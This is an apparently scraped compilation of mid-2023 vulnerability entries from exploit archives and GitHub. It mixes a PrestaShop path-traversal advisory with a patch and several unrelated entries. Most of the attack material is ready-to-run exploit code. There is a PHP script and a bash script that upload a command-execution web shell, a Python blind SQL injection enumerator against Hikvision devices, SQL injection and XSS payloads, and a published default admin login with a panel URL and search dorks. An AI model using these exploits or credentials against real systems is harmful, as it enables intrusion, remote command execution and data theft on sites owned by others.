In the module “Image: WebP, Compress, Zoom, Lazy load, Alt & More” (ultimateimagetool) in versions up to 2.1.02 from Advanced Plugins for PrestaShop, a guest can download personal informations without restriction by performing a path traversal attack.

In the module “Image: WebP, Compress, Zoom, Lazy load, Alt & More” (ultimateimagetool) in versions up to 2.1.02 from Advanced Plugins for PrestaShop, a guest can download personal informations without restriction by performing a path traversal attack.

**Summary**

*   **CVE ID**: CVE-2023-30200
*   **Published at**: 2023-07-20
*   **Platform**: PrestaShop
*   **Product**: ultimateimagetool
*   **Impacted release**: <= 2.1.02 (considered to be “truly” fixed on 2.1.03 - see note below)
*   **Product author**: Advanced Plugins
*   **Weakness**: CWE-22
*   **Severity**: high (7.5), GDPR violation

**Description**

Due to a lack of control in the path name construction, a guest can perform a path traversal to view all files on the information system.

Note : The author has deleted from its module the file that have been suffering from this leak for months, BUT did not set it to be “auto-deleted” during upgrades. Therefore, there are likely merchants out there with older versions who have updated their modules thinking they are safe. However, there is nothing safe about this since past upgrades do not auto-delete the implicated file. To ensure everyone has a “safe version”, we decided to mark all versions up to 2.1.02 as impacted by this issue.

**WARNING** : We are forced to tag it as a medium gravity due to the CWE type 22 but be warned that on our ecosystem, it must be considered critical since it unlocks hundreds admin’s ajax script of modules due to this : https://github.com/PrestaShop/PrestaShop/blob/6c05518b807d014ee8edb811041e3de232520c28/classes/Tools.php#L1247.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: none
*   **Availability**: none

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

**Possible malicious usage**

*   Stealing secrets to unlock admin controllers based on ajax script
*   Exfiltrate all modules with all versions to facilite pentesting
*   Stealing table\_prefix to greatly facilitate SQL injections for kiddies who don’t know how to exploit DBMS design’s vulnerabilities or steal database access to login in exposed PHPMyAdmin/Adminer/etc.
*   Bypass WAF / htaccess restrictions to read forbidden files (such as logs on predictible paths of banks’s modules inside /var/log/)

**Patch from 1.5.96**

    --- 1.5.96/modules/ultimateimagetool/image.php
    +++ XXXXXX/modules/ultimateimagetool/image.php
    -	$src = urldecode($_GET['image']);
    +	$src = basename(urldecode($_GET['image']));
    

Be warned that this fix is perfectible. See recommendations below.

**Other recommendations**

*   It’s recommended to upgrade to the latest version of the module **ultimateimagetool**.
*   You should consider restricting the access of modules/ultimateimagetool/images.php to a whitelist
*   NEVER expose a PHPMyAdmin / Adminer / etc without, at least, a htpasswd
*   Activate OWASP 930’s rules on your WAF (Web application firewall) and adjust it for your PrestaShop

**Timeline**

Date

Action

2023-03-29

Issue discovered during a code review by TouchWeb.fr

2023-03-29

Contact PrestaShop Addons security Team to confirm versions scope by author

2023-04-01

Request CVE ID

2023-04-18

PrestaShop Addons confirms versions scopes

2023-04-18

Author provide patch

2023-04-24

Received CVE ID

2023-07-20

Publish this security advisory

**Links**

*   PrestaShop addons product page
*   National Vulnerability Database

CVE-2023-30200: [CVE-2023-30200] Improper Limitation of a Pathname to a Restricted Directory in Advanced Plugins - Image: WebP, Compress, Zoom, Lazy load, Alt & More module for PrestaShop

SQL injection vulnerability in diskusi.php in eNdonesia 8.7, allows an attacker to execute arbitrary SQL commands via the "rid=" parameter.

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**1** branch **0** tags

Code

*   Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

Proof of Concept for CVE-2023-31753

Description: A SQL Injection vulnerability was discovered in eNdonesia Portal v8.7 which is exploited upon inserting crafted payload into "rid" parameter in diskusi.php.

*   Exploit Title: eNdonesia Portal 8.7 - SQL injection vulnerability in diskusi.php (rid parameter)
*   Date: May 19, 2023
*   Exploit Author: Kunal Khubchandani
*   Vendor Homepage: http://www.endonesia.org/
*   Software Link: https://sourceforge.net/projects/endonesia/
*   Version: 8.7
*   Category: Webapps
*   Tested on: WiN11\_x64/KaLiLinuX\_x64
*   CVE : CVE-2023-31753

#POC:

1.  To exploit this vulnerability, one must send a SQLi sleep payload as a value of "rid" GET Parameter in the following HTTP request.
    
2.  Vulnerable Request:
    

GET /endonesia.8.7.en/mod.php?mod=diskusi&op=delres&rid=(select\*from(select(sleep(20)))a) HTTP/1.1  
Host: TARGET  
Accept-Encoding: gzip, deflate  
Accept: _/_  
Accept-Language: en-US;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36  
Connection: close  
Cache-Control: max-age=0  

3.  Upon sending the above http request through Burp Suite, the user will receive a response with a 20 seconds delay.

\*\* 20 Seconds Delay:

\*\* 30 Seconds Delay:

CVE-2023-31753: GitHub - khmk2k/CVE-2023-31753: Proof of Concept for CVE-2023-31753 - eNdonesia Portal 8.7

A Cross-Site Request Forgery (CSRF) in the Admin portal of Cockpit CMS v2.5.2 allows attackers to execute arbitrary Administrator commands.

CVE-2023-37650: Multiple Vulnerabilities in Cockpit CMS <= v2.5.2

Millhouse-Project v1.414 was discovered to contain a remote code execution (RCE) vulnerability via the component /add_post_sql.php.

    <?php
    /*
    Exploit Title: thrsrossi Millhouse-Project 1.414 - Remote Code Execution
    Date: 12/05/2023
    Exploit Author: Chokri Hammedi
    Vendor Homepage: https://github.com/thrsrossi/Millhouse-Project
    Software Link: https://github.com/thrsrossi/Millhouse-Project.git
    Version: 1.414
    Tested on: Debian
    CVE: N/A
    */
    
    
    $options = getopt('u:c:');
    
    if(!isset($options['u'], $options['c']))
    die("\033[1;32m \n Millhouse Remote Code Execution \n Author: Chokri Hammedi
    \n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n
    \033[0m\n
    \n");
    
    $target     =  $options['u'];
    
    $command    =  $options['c'];
    
    $url = $target . '/includes/add_post_sql.php';
    
    
    $post = '------WebKitFormBoundaryzlHN0BEvvaJsDgh8
    Content-Disposition: form-data; name="title"
    
    helloworld
    ------WebKitFormBoundaryzlHN0BEvvaJsDgh8
    Content-Disposition: form-data; name="description"
    
    <p>sdsdsds</p>
    ------WebKitFormBoundaryzlHN0BEvvaJsDgh8
    Content-Disposition: form-data; name="files"; filename=""
    Content-Type: application/octet-stream
    
    
    ------WebKitFormBoundaryzlHN0BEvvaJsDgh8
    Content-Disposition: form-data; name="category"
    
    1
    ------WebKitFormBoundaryzlHN0BEvvaJsDgh8
    Content-Disposition: form-data; name="image"; filename="rose.php"
    Content-Type: application/x-php
    
    <?php
    $shell = shell_exec("' . $command . '");
    echo $shell;
    ?>
    
    ------WebKitFormBoundaryzlHN0BEvvaJsDgh8--
    ';
    
    $headers = array(
        'Content-Type: multipart/form-data;
    boundary=----WebKitFormBoundaryzlHN0BEvvaJsDgh8',
        'Cookie: PHPSESSID=rose1337',
    );
    
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HEADER, true);
    
    $response = curl_exec($ch);
    curl_close($ch);
    
    // execute command
    
    $shell = "{$target}/images/rose.php?cmd=" . urlencode($command);
    $ch = curl_init($shell);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $exec_shell = curl_exec($ch);
    curl_close($ch);
    echo "\033[1;32m \n".$exec_shell . "\033[0m\n \n";
    
    ?>

CVE-2023-37165: OffSec’s Exploit Database Archive

A vulnerability was found in Beijing Netcon NS-ASG 6.3. It has been classified as problematic. This affects an unknown part of the file /admin/test_status.php. The manipulation leads to direct request. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235059. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE-2023-3792

Online Piggery Management System version 1.0 suffers from a remote shell upload vulnerability.

    #!/bin/bash# Exploit Title: Online Piggery Management System v1.0 - unauthenticated file upload vulnerability# Date: July 12 2023# Exploit Author: 1337kid# Software Link: https://www.sourcecodester.com/php/11814/online-pig-management-system-basic-free-version.html# Version: 1.0# Tested on: Ubuntu# CVE : CVE-2023-37629## chmod +x exploit.sh# ./exploit.sh web_url# ./exploit.sh http://127.0.0.1:8080/echo "   _____   _____   ___ __ ___ ____   ________ __ ___ ___ "echo "  / __\\ \\ / / __|_|_  )  \\_  )__ /__|__ /__  / /|_  ) _ \\"echo " | (__ \\ V /| _|___/ / () / / |_ \\___|_ \\ / / _ \\/ /\\_, /"echo "  \\___| \\_/ |___| /___\\__/___|___/  |___//_/\\___/___|/_/ "echo "                         @1337kid"echo if [[ $1 == '' ]]; then    echo "No URL specified!"    exitfibase_url=$1unauth_file_upload() {    # CVE-2023-37629 - File upload vuln    echo "Generating shell.php"#===========cat > shell.php << EOF<?php system(\$_GET['cmd']); ?>EOF#===========    echo "done"    curl -s -F pigphoto=@shell.php -F submit=pwned $base_url/add-pig.php > /dev/null    req=$(curl -s -I $base_url"uploadfolder/shell.php?cmd=id" |  head -1 | awk '{print $2}')    if [[ $req == "200" ]]; then        echo "Shell uploaded to $(echo $base_url)uploadfolder/shell.php"    else        echo "Failed to upload a shell"    fi}req=$(curl -I -s $base_url | head -1 | awk '{print $2}')if [[ $req -eq "200" ]]; then    unauth_file_uploadelse    echo "Error"    echo "Status Code: $req"fi

Online Piggery Management System 1.0 Shell Upload

Hikvision Hybrid SAN Ds-a71024 firmware suffers from a remote blind SQL injection vulnerability.

    # Exploit Title: Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution# Date: 16  July 2023# Exploit Author: Thurein Soe# CVE : CVE-2022-28171# Vendor Homepage: https://www.hikvision.com# Software Link: N/A# Refence Link: https://cve.report/CVE-2022-28171# Version: Filmora 12: Ds-a71024 Firmware, Ds-a71024 Firmware Ds-a71048r-cvs Firmware Ds-a71048 Firmware Ds-a71072r Firmware Ds-a71072r Firmware Ds-a72024 Firmware Ds-a72024 Firmware Ds-a72048r-cvs Firmware Ds-a72072r Firmware Ds-a80316s Firmware Ds-a80624s Firmware Ds-a81016s Firmware Ds-a82024d Firmware Ds-a71048r-cvs Ds-a71024 Ds-a71048 Ds-a71072r Ds-a80624s Ds-a82024d Ds-a80316s Ds-a81016s'''Vendor Description:Hikvision is a world-leading surveillance manufacturer and supplier ofvideo surveillance and Internet of Things (IoT) equipment for civilian andmilitary purposes.Some Hikvision Hybrid SAN products were vulnerable to multiple remote codeexecution vulnerabilities such as command injection, Blind SQL injection,HTTP request smuggling, and reflected cross-site scripting.This resulted in remote code execution that allows an adversary to executearbitrary operating system commands and more. However, an adversary must beon the same network to leverage this vulnerability to execute arbitrarycommands.Vulnerability description:A manual test confirmed that The download type parameter was vulnerable toBlind SQL injection.I created a Python script to automate and enumerate SQLversions as the Application was behind the firewall and block all therequests from SQLmap.Request Body:GET/web/log/dynamic_log.php?target=makeMaintainLog&downloadtype='(select*from(select(sleep(10)))a)'HTTP/1.1Host: X.X.X.X.12:2004Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36Connection: closePOC:'''import requestsimport timeurl = "http://X.X.X.X:2004/web/log/dynamic_log.php"# Function to check if the response time is greater than the specified delaydef is_response_time_delayed(response_time, delay):    return response_time >= delay# Function to perform blind SQL injection and check the response timedef perform_blind_sql_injection(payload):    proxies = {        'http': 'http://localhost:8080',        'https': 'http://localhost:8080',    }    params = {        'target': 'makeMaintainLog',        'downloadtype': payload    }    headers = {        'Accept-Encoding': 'gzip, deflate',        'Accept': '*/*',        'Accept-Language': 'en',        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36',        'Connection': 'close'    }    start_time = time.time()    response = requests.get(url, headers=headers, params=params,proxies=proxies)    end_time = time.time()    response_time = end_time - start_time    return is_response_time_delayed(response_time, 20)# Enumerate the MySQL versiondef enumerate_mysql_version():    version_Name = ''    sleep_time = 10  # Sleep time is 10 seconds    payloads = [        f"' AND (SELECT IF(ASCII(SUBSTRING(@@version, {i}, 1))={mid},SLEEP({sleep_time}), 0))-- -"        for i in range(1, 11)        for mid in range(256)    ]    for payload in payloads:        if perform_blind_sql_injection(payload):            mid = payload.split("=")[-1].split(",")[0]            version_Name += chr(int(mid))    return version_Name# Enumeration is completedversion_Name = enumerate_mysql_version()print("MySQL version is:", version_Name)

Hikvision Hybrid SAN Ds-a71024 SQL Injection

CMS Nexin Adminisztracios Kozpont version 1.2 appears to leave default credentials installed after installation.

**CMS Nexin Adminisztracios Kozpont 1.2 Insecure Settings**

Posted Jul 20, 2023

Authored by indoushka

CMS Nexin Adminisztracios Kozpont version 1.2 appears to leave default credentials installed after installation.

tags | exploit

SHA-256 | e614477d10fc119020f0bb6bfcef55d3cf59f2217502dd441fe065c9b47251c1

Download | Favorite | View

**CMS Nexin Adminisztracios Kozpont 1.2 Insecure Settings**

    ====================================================================================================================================| # Title     : CMS Nexin Adminisztrációs Központ v1.2 Insecure Settings Vulnerability                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               || # Vendor    : http://www.composeit.hu/                                                                                           |  | # Dork      : Nexin Adminisztrációs Központ v1.2                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] appears to leave a default administrative account in place post installation.[+] Panel : http://discocenterhu/admin/[+] User : root & pass : job314Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,726)
*   Arbitrary (16,152)
*   BBS (2,859)
*   Bypass (1,733)
*   CGI (1,025)
*   Code Execution (7,236)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,333)
*   DoS (23,360)
*   Encryption (2,365)
*   Exploit (51,612)
*   File Inclusion (4,208)
*   File Upload (965)
*   Firewall (821)
*   Info Disclosure (2,755)
*   Intrusion Detection (890)
*   Java (3,032)
*   JavaScript (851)
*   Kernel (6,641)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,661)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,661)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,636)
*   Security Tool (7,874)
*   Shell (3,176)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,303)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,709)
*   Web (9,621)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,857)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,793)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,229)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,590)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,754)
*   UNIX (9,267)
*   UnixWare (186)
*   Windows (6,565)
*   Other

CMS Nexin Adminisztracios Kozpont 1.2 Insecure Settings

CMS NaiveScripters version 3.0.1 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : CMS NaiveScripters v3.0.1 XSS Vulnerability                                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 62.0.3 (32-bit)                                            || # Vendor    : https://codecanyon.net/                                                                                            |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] use payload : /events.php?id=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://127.0.0.1/oceannstuedubd/events.php?id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CMS NaiveScripters 3.0.1 Cross Site Scripting

CMS iQ-Digital version 2.0 suffers from a cross site scripting vulnerability.

**CMS iQ-Digital 2.0 Cross Site Scripting**

Posted Jul 20, 2023

Authored by indoushka

CMS iQ-Digital version 2.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 3320c1901d54ffd35aac7dcb03095b447934214a707ed6d7ebb3179839c2a7c6

Download | Favorite | View

**CMS iQ-Digital 2.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : CMS iQ-Digital v2.0 XSS Vulnerability                                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://iq-medya.net.tr                                                                                            |  | # Dork      : intext:''Tasarım iQ Digital''                                                                                      |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /tr/blog.php?page=<script>alert(/indoushka/);</script>[+]  http://127.0.0.1/uzmangayrimenkulcomtr/tr/blog.php?page=%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,726)
*   Arbitrary (16,152)
*   BBS (2,859)
*   Bypass (1,733)
*   CGI (1,025)
*   Code Execution (7,236)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,333)
*   DoS (23,360)
*   Encryption (2,365)
*   Exploit (51,612)
*   File Inclusion (4,208)
*   File Upload (965)
*   Firewall (821)
*   Info Disclosure (2,755)
*   Intrusion Detection (890)
*   Java (3,032)
*   JavaScript (851)
*   Kernel (6,641)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,661)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,661)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,636)
*   Security Tool (7,874)
*   Shell (3,176)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,303)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,709)
*   Web (9,621)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,857)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,793)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,229)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,590)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,754)
*   UNIX (9,267)
*   UnixWare (186)
*   Windows (6,565)
*   Other

Tag

#php